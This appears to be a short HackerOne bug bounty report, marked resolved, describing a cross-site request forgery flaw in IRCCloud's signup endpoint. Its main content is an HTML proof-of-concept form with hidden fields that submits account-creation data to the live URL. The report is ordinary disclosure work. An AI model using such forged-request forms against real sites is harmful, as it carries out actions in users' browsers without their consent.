User Account Creation CSRF
Unknown
Vulnerability Details
Any One Account Can be created and display home screen
<html>
<!-- CSRF PoC chandrakant->
<body>
<form action="https://www.irccloud.com/chat/signup" method="POST">
<input type="hidden" name="email" value="chandra.kantnial8@gmail.com" />
<input type="hidden" name="password" value="chandra1" />
<input type="hidden" name="realname" value="chandrakant1" />
<input type="hidden" name="invite" value="" />
<input type="hidden" name="org_invite" value="" />
<input type="hidden" name="_reqid" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Please Fix this
Actions
View on HackerOneReport Stats
- Report ID: 7051
- State: Closed
- Substate: resolved
- Upvotes: 3